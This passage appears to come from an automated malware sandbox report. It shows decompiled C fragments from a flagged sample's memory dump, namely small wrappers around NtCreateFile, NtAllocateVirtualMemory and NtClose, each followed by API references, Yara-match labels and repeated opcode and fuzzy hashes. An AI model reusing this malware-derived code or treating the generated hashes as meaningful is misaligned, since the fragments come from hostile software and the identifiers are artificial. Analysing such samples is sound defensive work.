                                                                                                                                                                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                                                                              				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                                                                              				return _t21;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004181df
                                                                                                                                                                                                              0x004181e7
                                                                                                                                                                                                              0x0041821d
                                                                                                                                                                                                              0x00418221

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                              • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                                              				long _t14;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                                                                              				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004183bf
                                                                                                                                                                                                              0x004183c7
                                                                                                                                                                                                              0x004183e9
                                                                                                                                                                                                              0x004183ed

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                              • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                                              			E004182FA(intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                              				long _t8;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                              				asm("fisttp qword [ebp+0x39]");
                                                                                                                                                                                                              				asm("lock enter 0x8b55, 0xec");
                                                                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                                                                              				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                                                                              				_t3 = _t5 + 0xc50; // 0x409753
                                                                                                                                                                                                              				E00418DD0(_a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                                                                              				_t8 = NtClose(_a8); // executed
                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004182fa
                                                                                                                                                                                                              0x004182fb
                                                                                                                                                                                                              0x004182fe
                                                                                                                                                                                                              0x00418303
                                                                                                                                                                                                              0x00418306
                                                                                                                                                                                                              0x0041830f
                                                                                                                                                                                                              0x00418317
                                                                                                                                                                                                              0x00418325
                                                                                                                                                                                                              0x00418329

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                                                              • Opcode ID: f555a7b39e915d5e4769d475de73904e5f92f1de1464ca2eeb1a1b7932aa5138
                                                                                                                                                                                                              • Instruction ID: c1b593146b7ba36b0e78838a9d1a372f48e027174a0eef73d914e9c969c4d4f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f555a7b39e915d5e4769d475de73904e5f92f1de1464ca2eeb1a1b7932aa5138
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99E0C276200214BBE710DF94CC45EEB7B28EF84360F104499FA489B281CA30EA00C7E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00418300(intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                              				long _t8;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                                                                              				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                                                                              				_t3 = _t5 + 0xc50; // 0x409753
                                                                                                                                                                                                              				E00418DD0(_a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                                                                              				_t8 = NtClose(_a8); // executed
                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x00418303
                                                                                                                                                                                                              0x00418306
                                                                                                                                                                                                              0x0041830f
                                                                                                                                                                                                              0x00418317
                                                                                                                                                                                                              0x00418325
                                                                                                                                                                                                              0x00418329

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                              • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
